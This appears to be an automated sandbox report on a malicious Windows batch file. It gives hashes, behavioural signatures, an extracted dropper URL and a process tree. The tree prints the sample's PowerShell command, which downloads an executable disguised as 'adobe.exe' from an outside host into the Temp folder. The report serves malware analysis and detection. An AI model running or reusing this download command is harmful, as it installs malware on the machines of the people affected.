Analysis
-
max time kernel
148s -
max time network
148s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
18/09/2024, 01:46
Static task
static1
Behavioral task
behavioral1
Sample
f282ea180ce6d32f11b086780ae1425336aebad1d0a98170f19f629703ddb941.bat
Resource
win7-20240729-en
7 signatures
150 seconds
Behavioral task
behavioral2
Sample
f282ea180ce6d32f11b086780ae1425336aebad1d0a98170f19f629703ddb941.bat
Resource
win10v2004-20240802-en
exelastealercollectioncredential_accessdefense_evasiondiscoveryevasionexecutionpersistenceprivilege_escalationpyinstallerspywarestealerupx
36 signatures
150 seconds
General
-
Target
f282ea180ce6d32f11b086780ae1425336aebad1d0a98170f19f629703ddb941.bat
-
Size
981B
-
MD5
55441f54cefe60f02b21640c5dbe9302
-
SHA1
e1c37e59d06151d02965bce54a39737e3ccd8520
-
SHA256
f282ea180ce6d32f11b086780ae1425336aebad1d0a98170f19f629703ddb941
-
SHA512
6f6c7ccaf694ae01a0b3feead5a715f1a2f3b3f0516d0dd63e81e90b22d0629b2c7f1c33b9a434fe0f652559d1bd65e8c7728307895094ed7b7038c7398b9ef3
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://bulletenergyllc.homes/deejay/adobe.exe
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 2756 powershell.exe -
Downloads MZ/PE file
-
pid Process 2756 powershell.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2008 timeout.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2756 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2756 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 1792 wrote to memory of 2692 1792 cmd.exe 31 PID 1792 wrote to memory of 2692 1792 cmd.exe 31 PID 1792 wrote to memory of 2692 1792 cmd.exe 31 PID 2692 wrote to memory of 2756 2692 cmd.exe 33 PID 2692 wrote to memory of 2756 2692 cmd.exe 33 PID 2692 wrote to memory of 2756 2692 cmd.exe 33 PID 2692 wrote to memory of 2008 2692 cmd.exe 34 PID 2692 wrote to memory of 2008 2692 cmd.exe 34 PID 2692 wrote to memory of 2008 2692 cmd.exe 34
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\f282ea180ce6d32f11b086780ae1425336aebad1d0a98170f19f629703ddb941.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1792 -
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\f282ea180ce6d32f11b086780ae1425336aebad1d0a98170f19f629703ddb941.bat min2⤵
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "try { (New-Object System.Net.WebClient).DownloadFile('http://bulletenergyllc.homes/deejay/adobe.exe', 'C:\Users\Admin\AppData\Local\Temp\dee.exe') } catch { Write-Host 'Error downloading file: ' $_.Exception.Message }"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2756
-
-
C:\Windows\system32\timeout.exetimeout /t 60 /nobreak3⤵
- Delays execution with timeout.exe
PID:2008
-
-